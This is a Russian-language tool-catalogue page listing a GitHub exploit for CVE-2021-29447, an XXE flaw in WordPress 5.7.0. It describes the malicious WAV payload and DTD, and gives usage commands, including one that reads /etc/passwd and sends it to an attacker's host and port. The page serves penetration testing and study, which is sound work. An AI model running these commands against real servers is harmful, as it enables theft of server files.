Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-29447 — Эксплойт для CVE-2021-29447, XXE-уязвимости в WordPress 5.7.0 и более ранних версиях. Создает вредоносные WAV-полезные нагрузки для чтения произвольных файлов сервера через внедрение внешних XML-сущностей. Включает тестовую среду Docker. | Kitploit
Инструменты/GitHubGitHub/danilo1992-sys/cve-2021-29447
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubdanilo1992-sys/cve-2021-29447

CVE-2021-29447

Эксплойт для CVE-2021-29447, XXE-уязвимости в WordPress 5.7.0 и более ранних версиях. Создает вредоносные WAV-полезные нагрузки для чтения произвольных файлов сервера через внедрение внешних XML-сущностей. Включает тестовую среду Docker.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
5 месяцев назадЕщё не проверено

CVE-2021-29447 - Эксплойт XXE-уязвимости WordPress

Описание

Этот репозиторий содержит эксплойт для CVE-2021-29447, XXE-уязвимости (XML External Entity) в WordPress 5.7.0 и более ранних версиях. Уязвимость существует в библиотеке medemblic, обрабатывающей WAV-файлы, что позволяет злоумышленнику читать произвольные файлы на сервере.

Требования

  • Bash
  • Python 3
  • Docker и Docker Compose (для запуска тестовой среды)
  • Уязвимый сервер WordPress (5.7.0 или ниже)

Файлы

ФайлОписание
CVE-2021-29447.shСкрипт эксплуатации, генерирующий полезную нагрузку WAV и вредоносный DTD
decode.phpPHP-скрипт для декодирования извлечённых данных (base64 + zlib)
docker-compose.ymlСреда Docker с уязвимым WordPress для тестирования

Использование

1. Запуск тестовой среды

root@kitploit:~
docker-compose up -d

2. Запуск эксплойта

root@kitploit:~
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <целевой_файл>

Параметры:

  • -l IP атакующего (LHOST)
  • -p Порт атакующего (LPORT)
  • -f Путь к файлу для чтения на сервере
  • -h Показать справку

Пример:

root@kitploit:~
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd

3. Декодирование данных

Извлечённые данные будут закодированы в base64 и сжаты с помощью zlib. Чтобы декодировать их:

root@kitploit:~
php decode.php

Техника

Эксплойт работает путём внедрения внешней сущности XXE в метаданные WAV-файла. Когда WordPress обрабатывает файл, XML-парсер разрешает внешнюю сущность, заставляя сервер выполнить HTTP-запрос к серверу атакующего с содержимым файла, закодированным в URL.

Ссылки

  • CVE-2021-29447
  • WordPress 5.7.0 Security Release

Предупреждение

Данный код предназначен только для образовательных целей и авторизованного тестирования на проникновение. Не используйте на системах без явного разрешения.

Скачать инструмент